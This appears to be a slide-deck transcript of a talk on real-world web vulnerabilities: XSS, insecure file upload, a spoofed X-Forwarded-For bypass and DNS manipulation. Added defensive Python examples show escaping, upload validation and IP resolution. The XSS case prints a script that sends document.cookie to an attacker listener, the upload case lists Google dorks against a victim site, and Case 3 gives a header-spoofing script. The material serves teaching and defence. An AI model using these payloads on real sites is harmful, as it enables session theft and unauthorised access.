Published by Matilda Carter. Modified over 9 years ago.
IDAsec copyright - all rights reserved
Web Vulnerabilities in the real world
About me: @Linkedin – Itzik Moshe. Security Researcher. Co-Founder & CEO of IDAsec. Lecturer, See-Security College.
Known terms: XSS, SQLi, CSRF, bla bla bla...
Study Case #1 - XSS
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because the browser thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws
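The flaw described above is output without encoding. The following added example (not code from the deck or from IDAsec) contrasts the vulnerable concatenation with output encoding for the HTML text and attribute contexts, and adds the second layer that blunts the cookie-stealing payload shown later in this case: an HttpOnly session cookie. The sample submission, the form field name and the cookie attributes are constructed for the illustration; only the PHPSESSID cookie name comes from the deck.

```python
import html

# Constructed sample submission for the "Contact Us" form: the same kind of
# payload the slide shows, a script that reads document.cookie.
SAMPLE_INPUT = "<script>alert(document.cookie)</script>"


def render_unsafe(name: str) -> str:
    """Vulnerable pattern: user input concatenated straight into the HTML response."""
    return "<p>Thanks, " + name + "</p>"


def render_escaped(name: str) -> str:
    """Hardened: entity-encode for the HTML text context at the point of output."""
    return "<p>Thanks, " + html.escape(name, quote=True) + "</p>"


def render_attribute(name: str) -> str:
    """Attribute context: always quote the attribute and escape quotes as well,
    so a value cannot close the attribute and start a new one."""
    return '<input name="contact" value="' + html.escape(name, quote=True) + '">'


def contains_script_tag(rendered: str) -> bool:
    """Check used by the test: does a raw <script tag survive into the output?"""
    return "<script" in rendered.lower()


def session_cookie_header(session_id: str) -> str:
    """Second layer, independent of escaping: mark the session cookie HttpOnly so
    a script running in the page cannot read it through document.cookie, and
    Secure so it is only sent over HTTPS. Cookie name follows the slide's PHPSESSID."""
    return "Set-Cookie: PHPSESSID=%s; HttpOnly; Secure; SameSite=Lax" % session_id


if __name__ == "__main__":
    print(render_unsafe(SAMPLE_INPUT))
    print(render_escaped(SAMPLE_INPUT))
    print(render_attribute('" onmouseover="x'))
    print(session_cookie_header("example-session-id"))
```

Escaping must be chosen per output context (text, attribute, URL, JavaScript); `html.escape` covers the first two, and a template engine with auto-escaping enabled does the same job with less chance of a missed call site.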
Example
Example
Study Case #1 – XSS. Diagram: Admin Panel Server; Website Server; no connection between main site & admin panel; temporary DB / synchronized DB.
Contact Us
Study Case #1 - XSS
var c = document.cookie;
var u = document.URL;
var xmlhttp = new XMLHttpRequest(); // the request object the slide leaves implicit
xmlhttp.open("POST", "myserver/listener", true);
xmlhttp.send("cookie=" + c + "&url=" + u);
Server Side
Cookie: "PHPSESSID=56669e7e1e131dc965ad8e9adc7501e0"
Url: Victimaddress.com
Inject the Cookie
Study Case #2 – Insecure Upload
Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked; then the attack only needs to find a way to get that code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multipart encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it. The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved.
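The two problem classes named above (metadata, then size and content) map directly onto an upload validator. This added example is not code from the deck or from IDAsec; the allowlist of types, the magic-byte table, the 2 MiB limit and the sample file bytes are assumptions constructed for the illustration. It validates the client-supplied name without ever using it for storage, checks that the bytes match the declared type, and stores under a random server-chosen name.

```python
import os
import secrets

MAX_SIZE = 2 * 1024 * 1024  # assumed policy limit: 2 MiB

# Constructed allowlist: permitted extension -> magic bytes the content must begin with
ALLOWED_SIGNATURES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "pdf": [b"%PDF-"],
}


class UploadRejected(ValueError):
    """Raised for any upload that fails validation."""


def safe_extension(client_filename: str) -> str:
    """Metadata check: ignore any directory part the client sent and allowlist
    the final extension. The name itself is never used for storage."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise UploadRejected("empty or directory-like file name")
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_SIGNATURES:
        raise UploadRejected("extension not allowed: %r" % ext)
    return ext


def check_content(ext: str, data: bytes) -> None:
    """Content check: size bound, magic bytes consistent with the declared type,
    and no interpreter open tag hidden inside an otherwise valid file."""
    if len(data) == 0 or len(data) > MAX_SIZE:
        raise UploadRejected("bad size")
    if not any(data.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        raise UploadRejected("content does not match declared type")
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded script tag in file")


def accept_upload(client_filename: str, data: bytes) -> str:
    """Full pipeline; returns the random server-side name to store the bytes under."""
    ext = safe_extension(client_filename)
    check_content(ext, data)
    return secrets.token_hex(16) + "." + ext


def is_accepted(client_filename: str, data: bytes) -> bool:
    """Convenience wrapper used by the test."""
    try:
        accept_upload(client_filename, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # Constructed sample: a minimal PNG header followed by padding
    print(accept_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(is_accepted("shell.php", b"<?php echo 1; ?>"))
```

Storing the file outside the web root (or on a host that serves it as static content only) is the complement to this check: even a file that slips through should never reach an interpreter.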
Study Case #2 – Insecure Upload. Diagram: main local server + temporary DB; off-line server + main DB; website (3rd party).
Some Google dorking...
Site:victim.com intext:upload
Site:victim.com inurl:upload
Site:victim.com intext:upload
https://www.exploit-db.com/google-hacking-database
Phishing
Study Case #2 – Insecure Upload: reverse connection within 3 minutes; inside the VPN; the IT manager turned off the entire company after 2 hours; white night (oops...).
Study Case #3 – Dumb Mistakes
Study Case #3 – Dumb Mistakes: HTTP header IP filter (X-Forwarded-For).
Study Case #3 – Dumb Mistakes: Login.php~, a list of authorized IP addresses.
Injecting Header
import urllib2, cookielib
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
# The header goes on the wire under its HTTP name; HTTP_X_FORWARDED_FOR is only
# the server-side variable PHP derives from it.
opener.addheaders = [('X-Forwarded-For', '1.2.3.4')]
resp = opener.open('http://example.com/logIP.php')
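The mistake in this case is deciding authorization from a header the client controls. This added example (not code from the deck or from IDAsec) shows the naive filter beside a hardened one that uses the TCP peer address and honours X-Forwarded-For only when the peer is a known reverse proxy, taking the hop that proxy appended rather than the client-supplied leftmost entry. The allow-list, the trusted-proxy address and the request dictionaries are constructed values in the shape of a WSGI environ.

```python
import ipaddress

# Constructed values: IPs permitted to reach the admin login, and the one
# reverse proxy whose X-Forwarded-For we are willing to believe.
AUTHORIZED_IPS = {"203.0.113.10", "198.51.100.5"}
TRUSTED_PROXIES = {"10.0.0.2"}


def client_ip_naive(environ: dict) -> str:
    """The slide's mistake: believe whatever X-Forwarded-For the client sends."""
    xff = environ.get("HTTP_X_FORWARDED_FOR")
    if xff:
        return xff.split(",")[0].strip()
    return environ["REMOTE_ADDR"]


def client_ip_hardened(environ: dict) -> str:
    """Start from the TCP peer (REMOTE_ADDR). Only if that peer is a trusted proxy
    look at X-Forwarded-For, and then take the rightmost entry, which is the
    address the trusted proxy itself appended. Anything further left was
    written by untrusted parties and is ignored."""
    peer = environ["REMOTE_ADDR"]
    if peer not in TRUSTED_PROXIES:
        return peer
    xff = environ.get("HTTP_X_FORWARDED_FOR", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    if not hops:
        return peer
    candidate = hops[-1]
    try:
        ipaddress.ip_address(candidate)
    except ValueError:
        return peer  # malformed header: fall back to the peer address
    return candidate


def is_authorized(environ: dict, resolver=client_ip_hardened) -> bool:
    """IP allow-list check, parameterised by the address-resolution strategy."""
    return resolver(environ) in AUTHORIZED_IPS


if __name__ == "__main__":
    # Constructed request: direct connection from an outside host that forges the header
    spoofed = {"REMOTE_ADDR": "192.0.2.77", "HTTP_X_FORWARDED_FOR": "203.0.113.10"}
    print("naive:", is_authorized(spoofed, client_ip_naive))
    print("hardened:", is_authorized(spoofed))
```

If there is more than one trusted proxy in the chain, walk the list from the right and skip each trusted address before stopping; the rule remains that only hops added by infrastructure you control are believed. An IP allow-list is at best a second factor; the credential check behind it must hold on its own.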
Conclusions: CHEAP OUTSOURCING != SECURITY
Case Study #4 – Authentication
Local network DNS manipulation: poison the DNS response; attacker runs a local PHP proxy; steal the victim's credentials.
Example
Solutions (sort of): cookie management; authentication layers (code); JavaScript / Ajax solutions.
Questions?